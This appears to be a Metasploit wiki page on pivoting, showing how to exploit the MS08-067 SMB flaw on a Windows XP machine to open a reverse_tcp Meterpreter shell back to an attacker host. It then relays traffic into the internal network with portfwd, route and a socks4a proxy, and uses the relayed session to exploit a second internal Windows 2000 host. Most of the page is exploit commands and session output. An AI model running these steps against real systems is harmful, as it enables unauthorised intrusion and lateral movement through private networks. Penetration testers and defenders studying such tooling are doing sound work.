Wiki

Pivoting¶

The Metasploit Framework supports a basic version of pivoting through the Meterpreter payload. Pivoting support is limited to Windows targets and only supports outbound TCP connections. As of version 3.3.2 the pivoting functionality in the Metasploit Framework is robust enough for common tasks. The first step to using pivoting is to gain access to a system using the Meterpreter payload. The example below demonstrates the process for exploiting the MS08-067 Server Service flaw on a Windows XP system.

$ msfconsole

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.136 
msf exploit(ms08_067_netapi) > set LPORT 4444 
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.141
msf exploit(ms08_067_netapi) > exploit 

[*] Started reverse handler on port 4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:Unknown
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.136:4444 -> 192.168.0.141:1042)

meterpreter >

Once a Meterpreter sessions is active, we have the ability to relay TCP connections through the target machine. If you compromised an internal system and would like to gain access to an internal web server, the portfwd command would do the trick:

meterpreter> portfwd add -l 8000 -p 80 -r 10.0.0.1
[*] Local TCP relay created: 0.0.0.0:8000 <-> 10.0.0.1:80

At this point a new service is exposed on the system running Metasploit that forwards all traffic to the specified host and port through the target. If we open our browser to http://127.0.0.1:8000/, our connection will be relayed across the Meterpreter session (over SSL since 3.3) and to the target server, displaying the internal web page locally. The portfwd command can be used with any TCP-based service on the target's network and is a great way to demonstrate access to internal resources once an internal user's machine has been compromised.

Instead of using the portfwd command directly, we can use the route command built into the Metasploit Framework console. First we need to place the Meterpreter session into the background:

metepreter> background
msf>

Then we use the route command to tell that framework that all communications should be relayed through the Meterpreter session

msf> route add 0.0.0.0 0.0.0.0 1

We can verify the route is working using the connect command from the console

msf> connect 10.0.0.1 80
GET / HTTP/1.0

HTTP/1.0 200 OK
< html data >

At this point, we can also use the socks4a proxy to allow other programs, like Firefox, to pivot through the encrypted tunnel and browse the internal network from the pivot machine.

msf> use auxiliary/server/socks4a 
msf auxiliary(socks4a) > show options

Module options (auxiliary/server/socks4a):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The address to listen on
   SRVPORT  1080             yes       The port to listen on.

msf auxiliary(socks4a) > run
[*] Auxiliary module execution completed

[*] Starting the socks4a proxy server

Once a route has been created, we can relay attacks through the established Meterpreter session and compromise internal machines. The pivoting feature supports outbound and inbound TCP connections, and we can use reverse_tcp stagers with the LHOST set to the pivot machine or simply bind_tcp stagers if the internal machine does not have direct access to the attacking system. In most cases, where the network has no egress filters, the reverse_tcp stagers back to the attacker will work fine (make sure LHOST is your real external IP address). The example below demonstrates the compromise of an internal machine through a relayed session.

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set LPORT 8989
msf exploit(ms08_067_netapi) > set RHOST 10.0.0.2
msf exploit(ms08_067_netapi) > exploit 

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2000 Service Pack 4 with MS05-010+ - lang:English
[*] Selected Target: Windows 2000 Universal
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 2 opened (192.168.0.136-192.168.0.141:0 -> 10.0.0.2:8989)

meterpreter >

Not finding what you are looking for? Try the Rapid7 Community Portal